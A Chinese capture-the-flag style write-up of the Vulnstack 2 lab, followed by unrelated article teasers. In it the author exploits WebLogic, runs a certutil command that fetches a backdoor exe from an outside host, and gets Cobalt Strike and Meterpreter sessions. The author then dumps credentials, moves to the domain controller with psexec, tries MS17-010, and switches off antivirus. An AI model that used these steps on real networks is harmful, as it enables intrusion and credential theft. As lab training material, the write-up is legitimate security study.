红日靶场vulnstack (二)

news2024/12/25 2:28:27

环境搭建

环境其实和vulnstack (一)差不多滴,只是变成有两台主机是具有两个IP的了。所有账号登录密码为1qaz@WSX,域管理员账号为administrator,密码和前面的一样。

Web:192.168.145.144(外),192.168.215.31(内)
PC:192.168.145.143(外),192.168.215.30(内)
DC:192.168.215.29(内)

Web主机添加一张网卡,网卡1选择NAT模式,网卡2选择LAN区段,LAN区段选择215网段即可。

本地连接1选择自动获取IP即可。

本地连接2配置如下。

PC主机也是和Web服务器一样的操作,本地连接1自动获取IP,本地连接2配置如下。

DC主机就一张网卡,选择LAN区段。本地连接如下。

最后在Web主机找到startWbLogic这个文件。

以管理员运行即可。

信息收集

nmap扫描一下网段,有143和144两台主机。

nmap -sP 192.168.145.* 

对143主机进行端口扫描,135端口开放可能存在Smb爆破,445端口开放可能存在ms17_010。

nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.143

对144主机进行端口扫描,多开启了个80端口和7001端口。

nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.144

访问网站看看,啥也没有。

扫一下网站目录,没发现有用的东西。

dirsearch -u http://192.168.145.144/ 

这是我想到144还开启了7001端口,而7001是weblogic服务的默认端口,直接加上端口再扫一下网站的目录。

getshell

CS上线

这次就有东西了,访问发现是一个Weblogic server网站后台。我试了试爆破,发现爆破不出来。直接利用Weblogic漏洞检测工具跑一下,还真有漏洞。

可以直接执行命令,相当于拿了一半的shell。

既然能命令执行,那么我该咋办呢。我一开始是想着写入一句话木马,但是当前目录下不是网站目录,你连接不了你的木马。其实可以CS生成一个后门放到服务器上面,然后再执行命令下载允许不就行了吗。生成后门我就不说了,直接执行命令下载到144主机上面。

certutil.exe -urlcache -split -f http://8.149.xxxx.xxxx:80/1111.exe 1111.exe

接着是执行它,便会上线CS。

start /b 1111.exe

MSF上线

其实这台主机的weblogic server的漏洞还是挺多的,但是上面的这个工具只能一个一个的去测试。

用下面这个脚本可以批量测试漏洞,但是它只能测2019之前的漏洞,2019之后的就测不了,上面工具可以。

下载地址:https://github.com/dr0op/WeblogicScan.git

python WeblogicScan.py 192.168.145.144  7001

不过在MSF中好像只有这个CVE-2019-2725可以利用,其它的漏洞都没有发现利用方式。

直接使用这个模块,设置好参数直接run。

成功获取meterpreter。

域内渗透

域内信息收集

判断是否存在域,返回如下说明存在一个名为de1ay.com的域。

net time /domain

现在进一步对域内的主机信息进行收集,可以用CS插件也可以用命令,查看域控主机名称。

ping一下域控名称,我们就知道域控的IP了。

ping DC.de1ay.com

查看域内用户。

net user /domain

查看域内的其它主机,可以看到还有一台PC主机。

net group "domain computers" /domain  # 查看域中的其他主机名

既然存在内网,那么我们进行一下端口探测。注意这里要先提权一下,直接用CS的插件进行MS14-058提权即可。先扫内网215网段,扫一下重要端口即可。

可以看到还存在30,29两台主机,31是我们的web服务器。从前面ping的域控名称可以知道,29是我们的域控,那么30就是我们的PC主机了,而且都开启了135,445端口。

再扫一下外网145网段。

可以看到还存在一台IP为143的主机,结合前面的信息我们可以判断是它是PC主机,也就是说PC主机是有两个网段的。

DC上线CS

既然都开启了135,445端口那么我们来尝试一下smb横移看看,先抓取密码。

创建smb监听器。

在目标列表右键29主机,选择psexec64。选择我们刚刚抓取的密码,监听器选择刚刚创建的smb监听器。

成功上线CS。

PC上线CS

接着是PC的上线,我试了试smb横移发现行,不太清楚为啥。

然后我用MSF使用第三个模块,扫了一下MS17_010漏洞。

发现有MS17_010漏洞。

利用攻击模块试试,但是没有成功,因为上面搜出来的0和1模块攻击对象都是x64的,而我们的PC是x86的。

使用2模块通过漏洞执行的,也不行,估计是PC上有安全软件啥的。

既然有安全软件,那么IPC连接传后门过去也不可能了,实际上IPC连接后没权限传递后门过去,不清楚为啥。前面我们还扫出143主机开放3389端口,我们可以试试远程桌面连接。用户名和密码就是我们刚刚抓取到的。

这里还是有些问题没搞懂,我远程连接之后登录de1ay/mssql,1qaz@WSX这个账号密码说我没权限啥的。

然后我用这个mssql ,1qaz@WSX也不行。其实到这里我有点蒙了,最后我又试试de1ay,1qaz@WSX这个账号密码,发现可以。

登录上去之后关掉360防护,那想干啥都行了。

总结

整体不算难的靶机,就是有些细节可能出了问题。比如smb横移不过去,远程桌面连接账号问题。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2048666.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基因组学系列4:参考转录本数据库MANE

1. 参考转录本数据库MANE简介 为了促进临床参照的一致性,美国国家生物技术信息中心( NCBI)和欧洲分子生物学实验室-欧洲生物信息学研究所(EMBL-EBI)合作发布了参考转录本数据库MANE(Matched Annotation from the NCBI and EMBL-EBI)&#xf…

Python之格式化输出

格式化输出 方法一:用%方法二:用format()函数设置输出的内容的宽度和小数位数 方法一:用% 直接用print()函数对字符串进行输出,是没有进行格式化控制的。 格式化,是对输出内容的显示方式进行设置。 首先,要…

有名管道和信号

3.无名管道 只能用于 亲缘关系 进程间 A.c B.c | | A B 有名管道 fifo:先入先出 创建有名管道:makepipe 1.是一种特殊文件 a.存在于 内存中 b.在系统中,有一个对应的名称 c.看文件的大小 0bytes pathname…

仓颉编程语言入门 -- I/O 流概述

I/O 流概述 一 . 什么是I/O 在仓颉编程语言的设计理念中,与外部实体(如文件系统、网络、用户输入等)的数据交换活动被统称为I/O操作,其中“I”代表输入(Input),而“O”则代表输出(O…

算法打卡 Day22(二叉树)-最大二叉树 + 合并二叉树 + 二叉搜索树中的搜索 + 验证二叉搜索树

文章目录 Leetcode 654-最大二叉树题目描述解题思路 Leetcode 617-合并二叉树**题目描述**解题思路 Leetcode 700-二叉搜索树中的搜索**题目描述**解题思路 Leetcode 98-验证二叉搜索树**题目描述**解题思路 Leetcode 654-最大二叉树 题目描述 https://leetcode.cn/problems/…

Nginx--虚拟机配置

前言:本博客仅作记录学习使用,部分图片出自网络,如有侵犯您的权益,请联系删除 1、什么是虚拟主机 虚拟主机是一种特殊的软硬件技术,它可以将网络上的每一台计算机分成多个虚拟主机,每个虚拟主机可以独立对…

C语言日常练习 Day16

目录 一、求一个3*3的整型矩阵对角线元素之和 二、有一个已经排序好了的数组,要求输入一个数后,按原来排序的规律将它插入数组中 三、输出“魔方阵”,所谓魔方阵是指它的每一行、每一列和对角线之和均相等 一、求一个3*3的整型矩阵对角线元…

3D数据可视化,B/S和C/S架构该如何选择?

针对3D数据可视化的展现形式,有B/S和C/两种架构可以选择,这两者区别是什么,分别有哪些优劣势,又有哪些对应的开发引擎或者软件,该如何选择呢,千汇数据工场通过本文给你讲明白。 一、什么是B/S和C/S模式 在…

DC-6靶机复现

靶机设置 设置靶机为NAT模式 靶机IP发现 nmap 192.168.112.0/24 靶机IP为192.168.112.141 目录扫描 访问浏览器 绑定hosts 再次访问成功 目录拼接 拼接/wp-login.php 发现后台登陆页面 使用webscan扫描 wpscan --url http://wordy -e u 发现了 admin,mark&am…

酷炫时尚未来科技视频开头PR模板MOGRT

这是一个高质量、组织良好、易于定制的pr模板。可以将此模板用于特殊活动、体育揭幕战、演示视频、快速和最小的企业促销。创建旅行介绍、干净的幻灯片、派对开场白和动态幻灯片。为YouTube、Vimeo或其他媒体托管网站创建视频。制作自己的杂志演示卷,展示你的作品集…

qt-13 进度条(模态和非模态)

进度条-模态和非模态 progressdlg.hprogressdlg.cppmain.cpp运行图模态非模态 progressdlg.h #ifndef PROGRESSDLG_H #define PROGRESSDLG_H#include <QDialog> #include <QLabel> #include <QLineEdit> #include <QProgressBar> #include <QCombo…

闲鱼卖1000元的带腾讯备案的 gaapqcloud.com.cn 域名低成本获取方法!

最近在闲鱼看到有人卖域名&#xff0c;声称是腾讯的备案&#xff0c;还卖1000多元&#xff01;逆天了&#xff01;这个信息差是真能割韭菜&#xff0c;我一查&#xff0c;这不就是腾讯云的全球应用加速域名吗&#xff1f;&#xff1f;&#xff1f;&#xff1f;&#xff1f;这样…

嵌入式day30

管道 --- 半双工通信方式 单工 //广播 --- 单一方向的数据通道 半双工 //对讲机 --- 同一时刻 只能有一个方向 全双工 //手机电话 --- 同一时刻两个方向都可以通信 无名管道 只能用于 亲缘关系进程间 有名管道 是一种特殊的文件 1.存在于 内…

GNN(一)

一、GNN应用领域 芯片设计 场景分析与问题推理 道路交通&#xff0c;动态流量预测 知识图谱 化学医疗等场景 物理模型相关 二、图的基本组成 利用神经网络的目的就是整合特征 图的邻接矩阵 每个像素点周围都有邻居 GAN中数据格式不固定&#xff0c;例如社交网络中人物关…

Processing练习之自动绘制

案例代码如下&#xff1a; import processing.pdf.*; import java.util.Calendar; boolean savePDF false; int maxCount 5000; int currentCount 1; float[] xnew float[maxCount]; float[] ynew float[maxCount]; float[] rnew float[maxCount]; void setup(){ siz…

可视化工具VOFA数据格式介绍

目录 概述 1 认识VOFA 1.1 VOFA特点 1.2 应用简介 2 数据格式介绍 2.1 FireWater格式 2.2 JustFloat格式 概述 本文主要介绍使用可视化工具VOFA打印数据的方法&#xff0c;该工具可以支持字符串类型和float类型的数据可视化操作&#xff0c;使用者只需按照协议要求填充数…

C++ stack、queue、priority_queue【介绍、常用接口、模拟实现】

0.容器适配器 0.1什么是适配器 适配器是一种设计模式&#xff0c;该种模式是将一个类的接口转换成客户希望的另外一个接口。 0.2 STL标准库中stack和queue的底层结构 虽然stack和queue中也可以存放元素&#xff0c;但在STL中并没有将其划分在容器的行列&#xff0c;而是将其…

RabbitMQ 消息可靠保障

RabbitMQ 消息可靠保障 消息的可靠性保证生产端到交换机和队列的可靠性保障解决思路A-确认机制解决思路B-备份交换机 MQ 服务器宕机导致消息丢失消费端消息的可靠性保障 消费端限流 消息的可靠性保证 实际项目中 MQ 的流程一般是&#xff1a;生产端把消息路由到交换机&#xf…

树 状 数 组

可差分信息&#xff1a;如果知道部分的信息&#xff0c;用整体的信息和部分的信息就可以求出剩余部分的信息&#xff0c;那么这个信息是可差分的 P3374 【模板】树状数组 1 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn) #include <iostream> #include <vector> u…